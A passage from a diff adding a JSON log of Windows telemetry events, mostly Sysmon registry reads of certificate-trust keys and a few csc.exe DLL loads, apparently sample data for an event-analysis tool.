131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", 
+ "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", 
+ "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 